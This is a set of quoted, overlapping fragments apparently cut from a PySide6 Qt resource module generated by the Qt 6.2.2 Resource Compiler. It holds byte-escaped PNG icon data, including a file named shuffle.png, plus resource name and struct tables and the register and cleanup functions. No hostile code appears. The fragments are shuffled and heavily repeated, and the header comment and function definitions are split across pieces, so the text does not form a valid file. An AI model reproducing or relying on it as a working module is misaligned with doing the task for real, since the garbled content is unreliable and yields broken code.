"\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources():",
"QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\",
"&\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\",
"\\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\",
"D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\",
"\\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\",
"\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\",
"made in this file will be lost! from PySide6 import QtCore qt_resource_data =",
"]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\",
"5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\",
"LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\",
"version 6.2.2 # WARNING! All changes made in this file will be lost!",
"= b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\",
"&\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\",
"3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\",
"T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\",
"\" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \"",
"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name,",
"#\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\",
"\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct,",
"\\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\",
"by: The Resource Compiler for Qt version 6.2.2 # WARNING! All changes made",
"0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\",
"(Python 3) # Created by: object code # Created by: The Resource Compiler",
"\\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\",
"\\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\",
"}\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\",
"for Qt version 6.2.2 # WARNING! All changes made in this file will",
"(j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\",
"\\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\",
"n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\",
